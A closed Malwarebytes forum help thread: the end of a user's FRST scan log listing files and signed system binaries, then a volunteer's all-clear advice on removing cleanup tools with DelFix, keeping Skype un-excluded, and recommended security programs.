2016-02-05 15:22 - 2015-12-18 07:11 - 00047760 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2016-02-05 15:22 - 2015-12-18 07:10 - 00099472 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2016-02-05 15:22 - 2015-12-18 07:10 - 00090768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2016-02-05 13:45 - 2016-02-05 13:45 - 00000000 ____D C:\Users\Eirik\Documents\Rise of the Tomb Raider
2016-02-05 13:45 - 2016-02-05 13:45 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Crystal Dynamics
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\Users\Eirik\Documents\League of Legends
2016-01-31 01:28 - 2016-01-31 01:28 - 00341353 _____ C:\Users\Eirik\Desktop\video-1446899994.mp4.mp4
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-27 02:02 - 2014-07-25 13:25 - 00003916 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{32D050CF-12B8-4CBE-8467-C4377C801BA0}
2016-02-27 02:00 - 2013-08-30 10:07 - 00000000 ___RD C:\Users\Eirik\Dropbox
2016-02-27 02:00 - 2013-08-30 10:04 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Dropbox
2016-02-27 01:59 - 2015-08-05 14:44 - 00000000 __RDO C:\Users\Eirik\OneDrive
2016-02-27 01:59 - 2012-07-26 08:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-27 01:56 - 2013-08-22 14:36 - 00000000 ____D C:\WINDOWS\Inf
2016-02-26 15:24 - 2015-12-30 22:05 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Skype
2016-02-26 15:23 - 2014-11-14 22:52 - 00000000 ____D C:\Users\Eirik\AppData\Local\Spotify
2016-02-26 15:20 - 2014-11-02 18:55 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-02-26 15:15 - 2014-11-14 22:52 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Spotify
2016-02-26 14:42 - 2013-08-29 17:54 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-730552332-2537374774-3045828507-1002
2016-02-26 14:28 - 2015-06-18 12:18 - 00000930 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-730552332-2537374774-3045828507-1002UA.job
2016-02-26 12:29 - 2013-09-14 00:46 - 00000024 _____ C:\Users\Eirik\random.dat
2016-02-26 12:28 - 2013-09-14 00:46 - 00000024 _____ C:\Users\Eirik\jagexappletviewer.preferences
2016-02-26 12:24 - 2013-09-14 00:46 - 00000044 _____ C:\Users\Eirik\jagex_cl_runescape_LIVE.dat
2016-02-26 03:19 - 2014-06-20 15:26 - 00000000 ____D C:\Users\Eirik
2016-02-25 21:06 - 2013-09-25 17:32 - 09135104 ___SH C:\Users\Eirik\Desktop\Thumbs.db
2016-02-25 18:07 - 2016-01-20 21:08 - 00004182 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-02-25 18:06 - 2013-09-04 05:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\CrashDumps
2016-02-25 18:04 - 2013-12-22 04:00 - 00000000 ____D C:\Users\Eirik\AppData\Local\LogMeIn Hamachi
2016-02-25 18:01 - 2014-06-20 15:13 - 00000000 ____D C:\ProgramData\NVIDIA
2016-02-25 18:01 - 2013-08-22 15:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-24 14:33 - 2013-12-13 23:26 - 00000000 ____D C:\ProgramData\InstallMate
2016-02-23 19:03 - 2013-08-22 16:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-02-22 23:04 - 2013-08-22 14:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-02-22 22:02 - 2013-09-06 10:34 - 00000000 ____D C:\Users\Eirik\AppData\LocalLow\Temp
2016-02-22 16:43 - 2014-03-18 10:51 - 01381246 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-22 16:43 - 2014-03-18 10:23 - 00450948 _____ C:\WINDOWS\system32\perfh014.dat
2016-02-22 16:43 - 2014-03-18 10:23 - 00077588 _____ C:\WINDOWS\system32\perfc014.dat
2016-02-21 21:10 - 2013-04-24 23:16 - 00000000 ____D C:\Program Files (x86)\Bluetooth Suite
2016-02-21 15:14 - 2013-11-19 23:06 - 00000000 ____D C:\Program Files (x86)\Google
2016-02-21 13:29 - 2015-12-26 01:49 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-02-21 13:26 - 2013-02-22 19:15 - 00000000 ____D C:\WINDOWS\hr
2016-02-21 12:42 - 2015-07-10 01:03 - 00000000 ____D C:\ProgramData\Apple
2016-02-20 19:45 - 2013-08-29 18:03 - 00000000 __SHD C:\WINDOWS\SysWOW64\AI_RecycleBin
2016-02-19 20:27 - 2013-08-22 15:44 - 05103608 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-02-19 18:26 - 2013-12-17 09:57 - 00000000 ____D C:\Users\Eirik\Desktop\Ny mappe
2016-02-19 12:54 - 2013-08-29 17:55 - 00000000 ____D C:\Users\Eirik\Desktop\Spill
2016-02-18 14:04 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-02-18 11:42 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-02-16 23:25 - 2015-11-13 18:03 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-16 13:24 - 2014-04-10 11:31 - 00000713 _____ C:\Users\Eirik\Desktop\Ranked stuff.txt
2016-02-14 04:28 - 2015-06-18 12:18 - 00000878 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-730552332-2537374774-3045828507-1002Core.job
2016-02-13 21:46 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\rescache
2016-02-13 03:06 - 2014-03-18 10:36 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-13 03:05 - 2014-12-12 01:15 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-02-13 03:05 - 2013-08-22 16:36 - 00000000 ___RD C:\WINDOWS\ToastData
2016-02-13 01:50 - 2015-08-18 23:07 - 00000000 ____D C:\Users\Eirik\.oracle_jre_usage
2016-02-13 01:49 - 2013-08-29 22:43 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-02-13 01:47 - 2013-12-05 19:11 - 00000000 ____D C:\Program Files\WinRAR
2016-02-13 01:46 - 2013-10-13 21:15 - 00000000 ____D C:\ProgramData\Oracle
2016-02-13 01:32 - 2013-10-06 01:40 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\vlc
2016-02-12 02:59 - 2013-08-30 16:41 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-12 02:54 - 2013-08-30 16:41 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-10 22:20 - 2014-11-02 18:55 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-02-10 10:21 - 2013-08-22 16:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-10 02:32 - 2013-08-30 14:06 - 00000000 ____D C:\ProgramData\Skype
2016-02-05 15:37 - 2014-06-20 15:12 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-02-05 15:37 - 2014-06-20 15:12 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-02-05 15:35 - 2014-06-20 15:12 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-02-05 15:27 - 2013-12-12 02:23 - 00000000 ____D C:\Users\Eirik\AppData\Local\NVIDIA
2016-02-02 03:37 - 2013-08-22 16:38 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-02 03:37 - 2013-08-22 16:38 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-31 13:43 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\system32\NDF
 
==================== Files in the root of some directories =======
 
2013-09-30 11:50 - 2013-09-30 13:33 - 0000132 _____ () C:\Users\Eirik\AppData\Roaming\Adobe BMP Format CS6 Prefs
2013-10-01 23:21 - 2015-11-29 14:29 - 0000132 _____ () C:\Users\Eirik\AppData\Roaming\Adobe PNG Format CS6 Prefs
2015-12-26 02:02 - 2015-12-26 02:02 - 0000046 _____ () C:\Users\Eirik\AppData\Roaming\Camdata.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0000408 _____ () C:\Users\Eirik\AppData\Roaming\CamLayout.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0000408 _____ () C:\Users\Eirik\AppData\Roaming\CamShapes.ini
2015-12-26 02:02 - 2015-12-26 02:02 - 0004536 _____ () C:\Users\Eirik\AppData\Roaming\CamStudio.cfg
2015-12-26 01:52 - 2015-12-26 01:52 - 0000096 _____ () C:\Users\Eirik\AppData\Roaming\version2.xml
2014-05-18 17:30 - 2014-05-18 21:19 - 0000173 _____ () C:\Users\Eirik\AppData\Local\msmathematics.qat.Eirik
2013-10-31 21:32 - 2013-10-31 21:46 - 0000600 _____ () C:\Users\Eirik\AppData\Local\PUTTY.RND
 
Some files in TEMP:
====================
C:\Users\Eirik\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-25 18:19
 
==================== End of FRST.txt ============================

 

Again, the post is too long, so I will add addition.txt as an attached File.

Addition.txt

Link to post
Share on other sites

Hello,
 

Right, damn. Yes, I believe I installed it right after I first posted or something. As I was after all getting the viruses while I had Avast (Which I still do have tho.), I thought I'd just buy SpyHunter which I saw someone recommend somewhere. Sorry if I should not have done that in the process or should have said so. 

You may wish to look into the dispute between BleepingComputer.com and Enigma Software Group. I will let you form your own opinion on the matter. 
 
Your logs are OK. Let's see if the following helps:
 
Qlf57ne.png Launching Mozilla Firefox in Safe Mode

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type firefox --safe-mode and click OK.
  • Leave all items unchecked.
  • Click Restart.
  • If you are presented with an option to simply Start in Safe Mode please select that. 
  • Let me know if Firefox functions normally. 
Link to post
Share on other sites

It did! Thank you so much for your help, Adam!

Now, just to round things up.
- Which of the programs installed in the process should I keep? (adwcleaner, Revo uninstaller etc)
- Should I have all the different antiviruses running at the same time? (Avast, SpyHunter 4 and MalwareBytes)
- It seems the popup I mentioned with skype is just happening because Skype is using so many different... something. Theres nothing to be afraid of, so I can add skype to the list of "cleared" processes?

Again, thank you so much for your help! You've been awesome. 

Link to post
Share on other sites

Excellent. :)
 

- Which of the programs installed in the process should I keep? (adwcleaner, Revo uninstaller etc)

Most of the tools used during this process are specalised, and should be removed from your computer. We have a programme (DelFix) that will automatically do this for you - instructions of which to follow below. Revo Uninstaller can either be left installed or uninstalled through your Control Panel - it's worth keeping installed in my opinion. 
 

- Should I have all the different antiviruses running at the same time? (Avast, SpyHunter 4 and MalwareBytes)

Malwarebytes Anti-Malware (Trial, Free or Premium) is not an Anti-Virus, or a replacement for one. The programme can run in conjunction with your real-time Anti-Virus, and should not cause any issues. Malwarebytes Anti-Malware Trial or Premium provides an extra layer of real-time protection; the Free version acts as an on-demand scanner to check for the presence of malware. Avast Anti-Virus and Malwarebytes Anti-Malware is a common combination of security programmes. As for SpyHunter 4, please see my earlier comment on the programme. 
 

- It seems the popup I mentioned with skype is just happening because Skype is using so many different... something. Theres nothing to be afraid of, so I can add skype to the list of "cleared" processes?

Skype is a Peer-to-Peer (P2P) programme, and connects to a wide range of IP addresses in order to establish a good or functioning connection. Sometimes Skype may connect to an IP address known to host malware. This is a risk of P2P programme usage. See here. I would not suggest adding Skype as an exclusion. 
 
All Clean!
Congratulations, your computer appears clean! smile.png
I see no signs of malware on your computer, and feel satisfied our work here is done. The steps below will remove the tools we have used, and reset any settings changed. I have also provided a list of resources and tools that you may find useful. 
 
AFZxnZc.jpg DelFix

  • Please download DelFix and save the file to your Desktop.
  • Double-click DelFix.exe to run the programme.
  • Place a checkmark next to the following items:
    • Remove disinfection tools
    • Create registry backup
    • Purge system restore (creates a Restore Point/removes all but the most recent)
    • Reset system settings
  • Click the Run button.

-- DelFix will remove the specialised tools we used to clean your computer. Any leftover logs, files, folders or tools remaining on your computer which were not removed can be deleted manually (right-click the file + delete).
 
======================================================
 
I have compiled below a list of resources you may find useful. The articles document information on computer security, common attack vectors and how you can stay safe on the Internet.

The following programmes come highly recommended in the security community.

  • KsUqI5A.png AdBlock is a browser add-on that blocks annoying banners, pop-ups and video ads.
  • E8I37RF.pngCryptoPrevent places policy restrictions on loading points for ransomware (eg. CryptoWall), helping prevent the execution of malware. 
  • EG85Vjt.png Malwarebytes Anti-Exploit (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
  • 6YRrgUC.png Malwarebytes Anti-Malware Premium (MBAM) works in real-time along side your Anti-Virus to prevent malware execution.
  • jv4nhMJ.png NoScript is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology.
  • DgW1XL2.png Secunia PSI will scan your computer for vulnerable software that is outdatedand automatically find the latest update for you.
  • JEP5iWI.png Web of Trust (WOT) is a browser add-on designed to alert you before interacting with a potentially malicious website.

-- Please feel free to ask if you have any questions or concerns on computer security or the programmes above.
 
======================================================
 
Please confirm you have no outstanding issues, and feel happy with the state of your computer. Once I have confirmation, we can wrap things up and I will close this topic. 
 
Thank you for using Malwarebytes.
 
Safe Surfing. smile.png    
Adam

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.